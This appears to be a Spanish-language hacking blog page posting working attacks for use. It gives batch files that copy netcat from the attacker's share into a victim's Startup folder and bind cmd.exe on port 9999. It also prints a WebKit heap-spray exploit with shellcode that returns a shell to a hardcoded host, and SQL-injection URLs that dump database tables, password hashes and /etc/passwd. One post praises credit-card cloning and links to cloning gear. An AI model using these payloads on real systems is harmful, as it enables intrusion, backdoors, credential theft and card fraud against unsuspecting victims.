(reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')

Técnica Especial (s) :
Estas opciones se pueden utilizar para tratar de inyectar código utilizando diferentes tipos de técnicas de XSS. Puede seleccionar múltiples:

--Coo COO - Cross Site Scripting Cookie injection
--Xsa XSA - Cross Site Agent Scripting
--Xsr XSR - Cross Site Referer Scripting
--Dcp DCP - Data Control Protocol injections
--Dom DOM - Use Anchor Stealth (DOM shadows!)

Seleccione la inyección final (s) :
Estas opciones se pueden utilizar para especificar el código final para inyectar en blanco vulnerable (s). Importante, si desea explotar en la naturaleza-sus vulnerabilidades descubiertas. Elija sólo una opción:

--Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
--Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
--B64 B64 - Base64 code encoding in META tag (rfc2397)
--Dos DOS - XSS Denial of service (client) attack!!

Inyección Especial Final (s) :
Estas opciones se pueden utilizar para ejecutar algunos "especiales" de la inyección (s) en un blanco vulnerable (s). Puede seleccionar varias y se combinan con el código final:

--Onm ONM - Use onMouseMove() event to inject code
--Ifr IFR - Use "iframe" source tag to inject code





lunes, 8 de noviembre de 2010

hackeando una computadore en red

Saludos Mundo Libre.

para la entrega numero 100 he decidido preparar halgo exelente asi que disfrutenla.

todo lo que necesita es un objetivo muy crédulos.

Como todos sabemos, un troyano es muy probable que sea recogido por AV, lo que necesita es Netcat, netcat se abre un puerto en un equipo de acceso (Si se utiliza correctamente por un lote de archivo que abra un puerto en un equipo de destino). Usted tendrá que escribir un archivo por lotes. El archivo por lotes para copiar netcat en el equipo remoto tendrá que ser ejecutado desde el equipo de destino (La persona en el blanco tendrá que ejecutar el archivo por lotes, de alguna manera). Abra el Bloc de notas y escriba esto en

@echo off

cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Guarde el archivo como un archivo por lotes usando el Bloc de notas.

El archivo por lotes siguiente se utiliza para hacer que el puerto que ha especificado abre todas las ventanas de tiempo se inicia, se puede especificar cualquier puerto que desee. Abra el Bloc de notas y escriba:

@echo off

cd\
netcat.exe -L -p 9999 -d -e cmd.exe

Guarde el archivo como un archivo por lotes usando el Bloc de notas, este será el archivo que se copia en la carpeta de inicio en el archivo por lotes anterior se escribió. Puede enlazar el archivo por lotes a otro archivo y compartir ese archivo, que el objetivo de ejecutar ese archivo para que pueda copiar netcat y el archivo de proceso por lotes en su / ordenador de ella por lo tanto abrir el puerto 9999, después de que el puerto 9999 se ha abierto, a continuación, puede utilizar telnet y telnet a ese puerto en el equipo de destino para tener acceso completo sin necesidad de contraseñas de cualquier tipo. Después de que se cambia la contraseña de administrador ya que si algo le sucede a sus archivos, el comando es la siguiente:

net user administrador newPassword

Ahora, desde aquí se puede hacer lo que quieras, por ejemplo, tratar de apagar el equipo de destino de la navegación a su carpeta system32 y luego escriba:

shutdown-r-t 10-c "Hola"

el equipo se reiniciará en 10 segundos. Usted puede incluso jugar un poco más por la instalación de Caín y Abel en el equipo y después instalar Abel de forma remota en su computadora (Como usted sabe la contraseña de administrador) Una vez que haya Abel en el destino que puede iniciar y detener los servicios y hacer más!

SpOonWiZaRd.

Saludos Mundo Libre.

WEAKERTHAN

Saludos hacktivistas he estado trabajando con un exelente iso live de seguridad Informatica ( hacking Informatico ) que es realmente lo que hacemos se trata de WEAKERTHAN que esta mas que completa una exelente herramienta para el Informatico que se preocupa por la seguridad y otros como nosotros para el hacking muy pero muy completo su liga para descargar es:

http://weaknetlabs.com/weaknet/download/

Realmente se los recomiendo una herramienta en linux para la cominidad Hacktivista.



Nivel de experiencia para su uso
Medio--Avanzado.

Como siempre apoyemos estos proyectos que nos facilitan el hacking.

Saludos Mundo Libre.

Google exploit Android

Saludos hacktivistas y como siempre he aqui un exploit para el os de google Android que explota el motor del Wedkit Browser he aqui el codigo.

html

head

script

// bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807

// listed as a safari bug but also works on android :)

//tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1

//patched= android 2.2

//author = mj

// hardcoded to return a shell to 10.0.2.2 port 2222

//

function sploit(pop)

{

var span = document.createElement("div");

document.getElementById("pwn").appendChild(span);

span.innerHTML = pop;

}

function heap()

{

var scode = unescape("\u3c84\u0057\u3c80\u0057\u3c7c\u0057\u3c78\u0057\u3c74\u0057\u3c70\u0057\u3c6c\u0057\u3c68\u0057\u3c64\u0057\u3c60\u0057\u3c5c\u0057\u3c58\u0057\u3c54\u0057\u3c50\u0057\u3c4c\u0057\u3c48\u0057\u3c44\u0057\u3c40\u0057\u3c3c\u0057\u3c38\u0057\u3c34\u0057\u3c30\u0057\u3c2c\u0057\u3c28\u0057\u3c24\u0057\u3c20\u0057\u3c1c\u0057\u3c18\u0057\u3c14\u0057\u3c10\u0057\u3c0c\u0057\u3c08\u0057\u3c04\u0057\u3bfc\u0057\u3bfc\u0057\u3bf8\u0057\u3bf4\u0057\u3bf0\u0057\u3bec\u0057\u3be8\u0057\u3be4\u0057\u3be0\u0057\u3bdc\u0057\u3bd8\u0057\u3bd4\u0057\u3bd0\u0057\u3bcc\u0057\u3bc8\u0057\u3bc4\u0057\u3bc0\u0057\u3bbc\u0057\u3bb8\u0057\u3bb4\u0057\u3bb0\u0057\u3bac\u0057\u3ba8\u0057\u3ba4\u0057\u3ba0\u0057\u3b9c\u0057\u3b98\u0057\u3b94\u0057\u3b90\u0057\u3b8c\u0057\u3b88\u0057\u3b84\u0057\u3b80\u0057\u3b7c\u0057\u3b78\u0057\u3b74\u0057\u3b70\u0057\u3b6c\u0057\u3b68\u0057\u3b64\u0057\u3b60\u0057\u3b5c\u0057\u3b58\u0057\u3b54\u0057\u3b50\u0057\u3b4c\u0057\u3b48\u0057\u3b44\u0057\u3b40\u0057\u3b3c\u0057\u3b38\u0057\u3b34\u0057\u3b30\u0057\u3b2c\u0057\u3b28\u0057\u3b24\u0057\u3b20\u0057\u3b1c\u0057\u3b18\u0057\u3b14\u0057\u3b10\u0057\u3b0c\u0057\u3b08\u0057\u3b04\u0057\u3afc\u0057\u3afc\u0057\u3af8\u0057\u3af4\u0057\u3af0\u0057\u3aec\u0057\u3ae8\u0057\u3ae4\u0057\u3ae0\u0057\u3adc\u0057\u3ad8\u0057\u3ad4\u0057\u3ad0\u0057\u3acc\u0057\u3ac8\u0057\u3ac4\u0057\u3ac0\u0057\u3abc\u0057\u3ab8\u0057\u3ab4\u0057\u3ab0\u0057\u3aac\u0057\u3aa8\u0057\u3aa4\u0057\u3aa0\u0057\u3a9c\u0057\u3a98\u0057\u3a94\u0057\u3a90\u0057\u3a8c\u0057\u3a88\u0057\u3a84\u0057\u3a80\u0057\u3a7c\u0057\u3a78\u0057\u3a74\u0057\u3a70\u0057\u3a6c\u0057\u3a68\u0057\u3a64\u0057\u3a60\u0057\u3a5c\u0057\u3a58\u0057\u3a54\u0057\u3a50\u0057\u3a4c\u0057\u3a48\u0057\u3a44\u0057\u3a40\u0057\u3a3c\u0057\u3a38\u0057\u3a34\u0057\u3a30\u0057\u3a2c\u0057\u3a28\u0057\u3a24\u0057\u3a20\u0057\u3a1c\u0057\u3a18\u0057\u3a14\u0057\u3a10\u0057\u3a0c\u0057\u3a08\u0057\u3a04\u0057\u39fc\u0057\u39fc\u0057\u39f8\u0057\u39f4\u0057\u39f0\u0057\u39ec\u0057\u39e8\u0057\u39e4\u0057\u39e0\u0057\u39dc\u0057\u39d8\u0057\u39d4\u0057\u39d0\u0057\u39cc\u0057\u39c8\u0057\u39c4\u0057\u39c0\u0057\u39bc\u0057\u39b8\u0057\u39b4\u0057\u39b0\u0057\u39ac\u0057\u39a8\u0057\u39a4\u0057\u39a0\u0057\u399c\u0057\u3998\u0057\u3994\u0057\u3990\u0057\u398c\u0057\u3988\u0057\u3984\u0057\u3980\u0057\u397c\u0057\u3978\u0057\u3974\u0057\u3970\u0057\u396c\u0057\u3968\u0057\u3964\u0057\u3960\u0057\u395c\u0057\u3958\u0057\u3954\u0057\u3950\u0057\u394c\u0057\u3948\u0057\u3944\u0057\u3940\u0057\u393c\u0057\u3938\u0057\u3934\u0057\u3930\u0057\u392c\u0057\u3928\u0057\u3924\u0057\u3920\u0057\u391c\u0057\u3918\u0057\u3914\u0057\u3910\u0057\u390c\u0057\u3908\u0057\u3904\u0057\u38fc\u0057\u38fc\u0057\u38f8\u0057\u38f4\u0057\u38f0\u0057\u38ec\u0057\u38e8\u0057\u38e4\u0057\u38e0\u0057\u38dc\u0057\u38d8\u0057\u38d4\u0057\u38d0\u0057\u38cc\u0057\u38c8\u0057\u38c4\u0057\u38c0\u0057\u38bc\u0057\u38b8\u0057\u38b4\u0057\u38b0\u0057\u38ac\u0057\u38a8\u0057\u38a4\u0057\u38a0\u0057\u389c\u0057\u3898\u0057\u3894\u0057\u3890\u0057\u388c\u0057\u3888\u0057\u3884\u0057\u3880\u0057\u387c\u0057\u3878\u0057\u3874\u0057\u3870\u0057\u386c\u0057\u3868\u0057\u3864\u0057\u3860\u0057\u385c\u0057\u3858\u0057\u3854\u0057\u3850\u0057\u384c\u0057\u3848\u0057\u3844\u0057\u3840\u0057\u383c\u0057\u3838\u0057\u3834\u0057\u3830\u0057\u382c\u0057\u3828\u0057\u3824\u0057\u3820\u0057\u381c\u0057\u3818\u0057\u3814\u0057\u3810\u0057\u380c\u0057\u3808\u0057\u3804\u0057\u37fc\u0057\u37fc\u0057\u37f8\u0057\u37f4\u0057\u37f0\u0057\u37ec\u0057\u37e8\u0057\u37e4\u0057\u37e0\u0057\u37dc\u0057\u37d8\u0057\u37d4\u0057\u37d0\u0057\u37cc\u0057\u37c8\u0057\u37c4\u0057\u37c0\u0057\u37bc\u0057\u37b8\u0057\u37b4\u0057\u37b0\u0057\u37ac\u0057\u37a8\u0057\u37a4\u0057\u37a0\u0057\u379c\u0057\u3798\u0057\u3794\u0057\u3790\u0057\u378c\u0057\u3788\u0057\u3784\u0057\u3780\u0057\u377c\u0057\u3778\u0057\u3774\u0057\u3770\u0057\u376c\u0057\u3768\u0057\u3764\u0057\u3760\u0057\u375c\u0057\u3758\u0057\u3754\u0057\u3750\u0057\u374c\u0057\u3748\u0057\u3744\u0057\u3740\u0057\u373c\u0057\u3738\u0057\u3734\u0057\u3730\u0057\u372c\u0057\u3728\u0057\u3724\u0057\u3720\u0057\u371c\u0057\u3718\u0057\u3714\u0057\u3710\u0057\u370c\u0057\u3708\u0057\u3704\u0057\u36fc\u0057\u36fc\u0057\u36f8\u0057\u36f4\u0057\u36f0\u0057\u36ec\u0057\u36e8\u0057\u36e4\u0057\u36e0\u0057\u36dc\u0057\u36d8\u0057\u36d4\u0057\u36d0\u0057\u36cc\u0057\u36c8\u0057\u36c4\u0057\u36c0\u0057\u36bc\u0057\u36b8\u0057\u36b4\u0057\u36b0\u0057\u36ac\u0057\u36a8\u0057\u36a4\u0057\u36a0\u0057\u369c\u0057\u3698\u0057\u3694\u0057\u3690\u0057\u368c\u0057\u3688\u0057\u3684\u0057\u3680\u0057\u367c\u0057\u3678\u0057\u3674\u0057\u3670\u0057\u366c\u0057\u3668\u0057\u3664\u0057\u3660\u0057\u365c\u0057\u3658\u0057\u3654\u0057\u3650\u0057\u364c\u0057\u3648\u0057\u3644\u0057\u3640\u0057\u363c\u0057\u3638\u0057\u3634\u0057\u3630\u0057\u362c\u0057\u3628\u0057\u3624\u0057\u3620\u0057\u361c\u0057\u3618\u0057\u3614\u0057\u3610\u0057\u360c\u0057\u3608\u0057\u3604\u0057\u35fc\u0057\u35fc\u0057\u35f8\u0057\u35f4\u0057\u35f0\u0057\u35ec\u0057\u35e8\u0057\u35e4\u0057\u35e0\u0057\u35dc\u0057\u35d8\u0057\u35d4\u0057\u35d0\u0057\u35cc\u0057\u35c8\u0057\u35c4\u0057\u35c0\u0057\u35bc\u0057\u35b8\u0057\u35b4\u0057\u35b0\u0057\u35ac\u0057\u35a8\u0057\u35a4\u0057\u35a0\u0057\u359c\u0057\u3598\u0057\u3594\u0057\u3590\u0057\u358c\u0057\u3588\u0057\u3584\u0057\u3580\u0057\u357c\u0057\u3578\u0057\u3574\u0057\u3570\u0057\u356c\u0057\u3568\u0057\u3564\u0057\u3560\u0057\u355c\u0057\u3558\u0057\u3554\u0057\u3550\u0057\u354c\u0057\u3548\u0057\u3544\u0057\u3540\u0057\u353c\u0057\u3538\u0057\u3534\u0057\u3530\u0057\u352c\u0057\u3528\u0057\u3524\u0057\u3520\u0057\u351c\u0057\u3518\u0057\u3514\u0057\u3510\u0057\u350c\u0057\u3508\u0057\u3504\u0057\u34fc\u0057\u34fc\u0057\u34f8\u0057\u34f4\u0057\u34f0\u0057\u34ec\u0057\u34e8\u0057\u34e4\u0057\u34e0\u0057\u34dc\u0057\u34d8\u0057\u34d4\u0057\u34d0\u0057\u34cc\u0057\u34c8\u0057\u34c4\u0057\u34c0\u0057\u34bc\u0057\u34b8\u0057\u34b4\u0057\u34b0\u0057\u34ac\u0057\u34a8\u0057\u34a4\u0057\u34a0\u0057\u349c\u0057\u3498\u0057\u3494\u0057\u3490\u0057\u348c\u0057\u3488\u0057\u3484\u0057\u3480\u0057\u347c\u0057\u3478\u0057\u3474\u0057\u3470\u0057\u346c\u0057\u3468\u0057\u3464\u0057\u3460\u0057\u345c\u0057\u3458\u0057\u3454\u0057\u3450\u0057\u344c\u0057\u3448\u0057\u3444\u0057\u3440\u0057\u343c\u0057\u3438\u0057\u3434\u0057\u3430\u0057\u342c\u0057\u3428\u0057\u3424\u0057\u3420\u0057\u341c\u0057\u3418\u0057\u3414\u0057\u3410\u0057\u340c\u0057\u3408\u0057\u3404\u0057\u33fc\u0057\u33fc\u0057\u33f8\u0057\u33f4\u0057\u33f0\u0057\u33ec\u0057\u33e8\u0057\u33e4\u0057\u33e0\u0057\u33dc\u0057\u33d8\u0057\u33d4\u0057\u33d0\u0057\u33cc\u0057\u33c8\u0057\u33c4\u0057\u33c0\u0057\u33bc\u0057\u33b8\u0057\u33b4\u0057\u33b0\u0057\u33ac\u0057\u33a8\u0057\u33a4\u0057\u33a0\u0057\u339c\u0057\u3398\u0057\u3394\u0057\u3390\u0057\u338c\u0057\u3388\u0057\u3384\u0057\u3380\u0057\u337c\u0057\u3378\u0057\u3374\u0057\u3370\u0057\u336c\u0057\u3368\u0057\u3364\u0057\u3360\u0057\u335c\u0057\u3358\u0057\u3354\u0057\u3350\u0057\u334c\u0057\u3348\u0057\u3344\u0057\u3340\u0057\u333c\u0057\u3338\u0057\u3334\u0057\u3330\u0057\u332c\u0057\u3328\u0057\u3324\u0057\u3320\u0057\u331c\u0057\u3318\u0057\u3314\u0057\u3310\u0057\u330c\u0057\u3308\u0057\u3304\u0057\u32fc\u0057\u32fc\u0057\u32f8\u0057\u32f4\u0057\u32f0\u0057\u32ec\u0057\u32e8\u0057\u32e4\u0057\u32e0\u0057\u32dc\u0057\u32d8\u0057\u32d4\u0057\u32d0\u0057\u32cc\u0057\u32c8\u0057\u32c4\u0057\u32c0\u0057\u32bc\u0057\u32b8\u0057\u32b4\u0057\u32b0\u0057\u32ac\u0057\u32a8\u0057\u32a4\u0057\u32a0\u0057\u329c\u0057\u3298\u0057\u3294\u0057\u3290\u0057\u328c\u0057\u3288\u0057\u3284\u0057\u3280\u0057\u327c\u0057\u3278\u0057\u3274\u0057\u3270\u0057\u326c\u0057\u3268\u0057\u3264\u0057\u3260\u0057\u325c\u0057\u3258\u0057\u3254\u0057\u3250\u0057\u324c\u0057\u3248\u0057\u3244\u0057\u3240\u0057\u323c\u0057\u3238\u0057\u3234\u0057\u3230\u0057\u322c\u0057\u3228\u0057\u3224\u0057\u3220\u0057\u321c\u0057\u3218\u0057\u3214\u0057\u3210\u0057\u320c\u0057\u3208\u0057\u3204\u0057\u31fc\u0057\u31fc\u0057\u31f8\u0057\u31f4\u0057\u31f0\u0057\u31ec\u0057\u31e8\u0057\u31e4\u0057\u31e0\u0057\u31dc\u0057\u31d8\u0057\u31d4\u0057\u31d0\u0057\u31cc\u0057\u31c8\u0057\u31c4\u0057\u31c0\u0057\u31bc\u0057\u31b8\u0057\u31b4\u0057\u31b0\u0057\u31ac\u0057\u31a8\u0057\u31a4\u0057\u31a0\u0057\u319c\u0057\u3198\u0057\u3194\u0057\u3190\u0057\u318c\u0057\u3188\u0057\u3184\u0057\u3180\u0057\u317c\u0057\u3178\u0057\u3174\u0057\u3170\u0057\u316c\u0057\u3168\u0057\u3164\u0057\u3160\u0057\u315c\u0057\u3158\u0057\u3154\u0057\u3150\u0057\u314c\u0057\u3148\u0057\u3144\u0057\u3140\u0057\u313c\u0057\u3138\u0057\u3134\u0057\u3130\u0057\u312c\u0057\u3128\u0057\u3124\u0057\u3120\u0057\u311c\u0057\u3118\u0057\u3114\u0057\u3110\u0057\u310c\u0057\u3108\u0057\u3104\u0057\u30fc\u0057\u30fc\u0057\u30f8\u0057\u30f4\u0057\u30f0\u0057\u30ec\u0057\u30e8\u0057\u30e4\u0057\u30e0\u0057\u30dc\u0057\u30d8\u0057\u30d4\u0057\u30d0\u0057\u30cc\u0057\u30c8\u0057\u30c4\u0057\u30c0\u0057\u30bc\u0057\u30b8\u0057\u30b4\u0057\u30b0\u0057\u30ac\u0057\u30a8\u0057\u30a4\u0057\u30a0\u0057\u309c\u0057\u3098\u0057\u3094\u0057\u3090\u0057\u308c\u0057\u3088\u0057\u3084\u0057\u3080\u0057\u307c\u0057\u3078\u0057\u3074\u0057\u3070\u0057\u306c\u0057\u3068\u0057\u3064\u0057\u3060\u0057\u305c\u0057\u3058\u0057\u3054\u0057\u3050\u0057\u304c\u0057\u3048\u0057\u3044\u0057\u3040\u0057\u303c\u0057\u3038\u0057\u3034\u0057\u3030\u0057\u302c\u0057\u3028\u0057\u3024\u0057\u3020\u0057\u301c\u0057\u3018\u0057\u3014\u0057\u3010\u0057\u300c\u0057\u3008\u0057\u3004\u0057\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002\uae08\u000a\u0202\u2000\u2000")

do {

scode += scode;

} while(scode.length < 0x1000);

target = new Array();

for(i = 0; i < 1000; i++)

target[i] = scode;

for (i = 0; i <= 1000; i++)

{

if (i>999)

{

sploit(-parseFloat("NAN(ffffe00572c60)"));

}

document.write("The targets!! " + target[i]);

document.write("
");

}

}

script

head

body id="pwn"

woot

script

heap();

script

body

html


Saludos mundo Libre.

Felis hacking.

jueves, 4 de noviembre de 2010

Clonado de tarjetas de Credito

Saludos Mundo Libre.

El Clonado de Tarjetas magneticas se concidera un delito gravoso con barios anos de carcel pero con la libre informacion el fishing y el glorioso Internet con Google se encuantran tantas herramientas para el Rrobo de identidad aparte de que la gente sea tan confiada que nunca cambia su password o no tiene precaucion con sus datos o las empresas las cuales que se dedican a la contratacion de personas para otras industrias tiren los curriculums de los candidatos y mucho mas.

El hacker no tenemos la culpa de estar a un paso adelante de los demas asi que abusados y no se quejen.

Esta liga expresa en pocas palabras a lo que me refiero.

http://www.yaclasificados.com.mx/avisos/-1/posts/2_Compras_Ventas/75_herramientas_maquinarias/28033_Vendo_equipo_completo_para_clonar_tarjetas_con_banda_magn_tica_1000.html

saludos Mundo Libre.

miércoles, 3 de noviembre de 2010

Facebook Hacking II

Saludos Mundo Libre.

==============================================================
FaceBook's servers was hacked again by Inj3ct0r Team [part II]
==============================================================



Part 1 Original: http://inj3ct0r.com/exploits/11638

Part 2 Original: http://inj3ct0r.com/exploits/13403


[+] English translation
Inj3ct0r official website => Inj3ct0r.com
Inj3ct0r community => 0xr00t.com

__ __ ___
__ __ /'__`\ /\ \__ /'__`\
/\_\ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __ ___ ___ ___ ___
\/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ /'___\ / __`\ /' __` __`\
\ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ __/\ \__//\ \L\ \/\ \/\ \/\ \
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ /\_\ \____\ \____/\ \_\ \_\ \_\
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/_/\/____/\/___/ \/_/\/_/\/_/
\ \____/
\/___/

[0x00] [Introduction]
[0x01] [Search for bugs / crash]
[0x02] [0wner]
[0x03] [Conclusion]
[0x04] [Greetz]

At the time of publication, all requests to work! Attached images : inj3ct0r.com/files/facebook_part2.zip

__ __ __
/'__`\ /'__`\ /'__`\
/\ \/\ \ __ _/\ \/\ \/\ \/\ \
\ \ \ \ \/\ \/'\ \ \ \ \ \ \ \ \
[Introduction]




In this log file you will read a limited version of the information gathered and provided, since the most important
parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.

We did not change the main page, do not sell backup server does not delete files.

We have demonstrated the flaw in the system. Start =] ..



oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Sir Zaid Personal RESPECT! y0u helped me in writing the article and find vulnerabilities.
Sir Zaid prifile: http://inj3ct0r.com/author/2580
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo



__ __ _
/'__`\ /'__`\ /' \
/\ \/\ \ __ _/\ \/\ \/\_, \
\ \ \ \ \/\ \/'\ \ \ \ \/_/\ \
[Search for bugs / crash]



inj3ct0r@host [/home]# ./inj3ct0r.com_0day_Search http://apps.facebook.com

...Search Vulnerabilities . . . . . . . . . .. . . .. . . . ..

[+] found 13 vulns and 6 warning
[+] open 31337 port yes
[+] connect...

Brevity the soul of wit..


inj3ct0r.com@mybox [~]

inj3ct0r.com@host [~]# cd /home

inj3ct0r@host [/home]# ./inj3ct0r.com_0day http://apps.facebook.com

...attack starting . . . . . . . . . .. . . .. . . . ..

__ __ ___
/'__`\ /'__`\ /'___`\
/\ \/\ \ __ _/\ \/\ \/\_\ /\ \
\ \ \ \ \/\ \/'\ \ \ \ \/_/// /__
[0wner]

Successful Shell on 31337 port . . . . .

inj3ct0r.com@host [/home]# ./nc -v 66.220.153.15 31337

...............................................................


apps.facebook@host [~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


-[0x33]- Proofs


############
# REQUESTS #
############

;===== BASIC INFO
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

;===== LIST TABLES
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST COLUMNS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!= 0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

;===== LIST WORDPRESS USERS/PASS
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

admin:$P$BQFUeKJK810OT9Y/Hmcx/hZdaRBEmw/
lucia:$P$BqEFbcc1.uPFB8SfIIDcmVq7pc40WK.
tom:$P$BlBjwW.57R/lHuoGLSUyAutopYdoEt/

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+churchwpdb.wp_users--+1

admin:$P$B6RRs18hNYnYWPgNy0brmY/qPg3W7b.
test:$P$BuuuSp.VN0Ha5/p11u20ATdWqeEk

-----

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1=2+UNION+SELECT+1,2,3,4,concat(user_login,0x3a,user_pass),6,7,8,9,10+from+luciacanduwp.wp_users--

admin:$P$B1jGLGuDkN6gNT68q92h3RG3wG4qwi/
lucia:$P$BBtUst3KjOqCdTNVVTGdWlgayz

################
# INFORMATIONS #
################
;===== PATH
/home/tomkincaid/tomkincaid.dreamhosters.com/facebookclient/shared_lib.php

;===== BASIC INFO
tomkincaid@ps5008.dreamhost.com
politicsapp
5.0.45-log

;===== TABLES

# astro
** app
** oscache
** user


# candukincaid
** wp_commentmeta
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_px_albumPhotos
** wp_px_albums
** wp_px_galleries
** wp_px_photos
** wp_px_plugins
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# cemeteries
** AmazonItem
** AmazonType
** CameraType
** Format
** Guestbook
** Links
** Photo
** Scan

# churchwpdb
** wp_comments
** eventscalendar_main
** icl_languages
** icl_languages_translations
** icl_locale_map
** icl_translations
** links
** options
** postmeta
** posts
** term_relationships
** term_taxonomy
** terms
** usermeta
** users

# countdownapp
** oscache
** user

# crush
** couple
** oscache
** user

# dare
** flag
** game
** item
** user

# friendiq
** oscache
** score
** user

# giants
** app
** league
** media
** mediaforuser
** oscache
** post
** team
** topic
** user

# hookup
** couple
** neverblue
** oscache
** user

# jauntlet
** user

# loccus
** checkin
** oscache
** user

# luciacanduwp
** wp_comments
** wp_links
** wp_options
** wp_postmeta
** wp_posts
** wp_term_relationships
** wp_term_taxonomy
** wp_terms
** wp_usermeta
** wp_users

# maps
** place
** user

# martisor
** user

# mediax
** oscache
** user

# mostlikely
** callback
** statement
** statementforuser
** user

# music
** itemforuser
** oscache
** user

# pimpfriends
** activity
** ad
** favorite
** gift
** giftforho
** hoforpimp
** johnforho
** oscache
** permission
** photoforuser
** room
** user
** wall
** whistle

# plans
** attend
** cache
** event
** place
** user

# politicsapp
** app
** badge
** badgeforuser
** issue
** oscache
** position
** positionforuser
** post
** user

# postergifts
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# posters2
** category
** categoryproduct
** categoryrelationship
** image
** oscache
** posterforuser
** user

# projectbasecamp
** clicktimeproject
** clicktimereport
** clicktimetask
** idcorrelation
** projectbudget
** taskforuser
** user

# pwnfriends
** photo
** photoforfriend
** photoforuser
** user

# quiz
** app
** question
** quiz
** result
** resultforquestion
** resultforuser
** user

# seeall
** network
** networkforuser
** test2
** userpref

# send
** app
** item
** itemforuser
** neverblue
** user

# supporter
** oscache
** user

# swapu
** item
** itemforuser
** network
** networkforuser
** swaptype
** user

# tomsapps
** ad
** adclick
** app
** contest
** notification

# travelbug
** bug
** bugcache
** user

# tv
** app
** oscache
** post
** series
** seriesforuser
** thread
** threadforuser
** user

# wikitravel
** badmap
** wikitravelimage
** wikitravelpage


---------------------------------------------------------------------------------------------------------------------------------------------------

load_file = yes magic_quotes = off

[+] Gathering MySQL Server Configuration...
Database: facebook
User: root@localhost
Version: 5.1.37-1ubuntu5.4

[+] Do we have Access to MySQL Database: YES <-- w00t w00t

[+] Dumping MySQL user info. user:password:host[+] Number of users in the mysql.user table: 4
[0] root::localhost
[1] root::ip-10-128-57-239
[2] root::127.0.0.1
[3] debian-sys-maint:*79E5005DD3B60F9100ACF7571D5DC9079388F408:localhost

[+] Do we have Access to Load_File: YES <-- w00t w00t

[+] Starting Load_File Fuzzer...
[+] Number of tables names to be fuzzed: 236

[!] Found /etc/passwd
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/passwd'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/hosts
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/hosts'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
[!] Found /etc/mysql/my.cnf
[!] http://apps.facebook.com/myhotdeals/promo.php?promoid=150+AND+1=2+UnIoN+aLL+SeLeCt+1,2,3,4,5,LOAD_FILE('/etc/mysql/my.cnf'),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
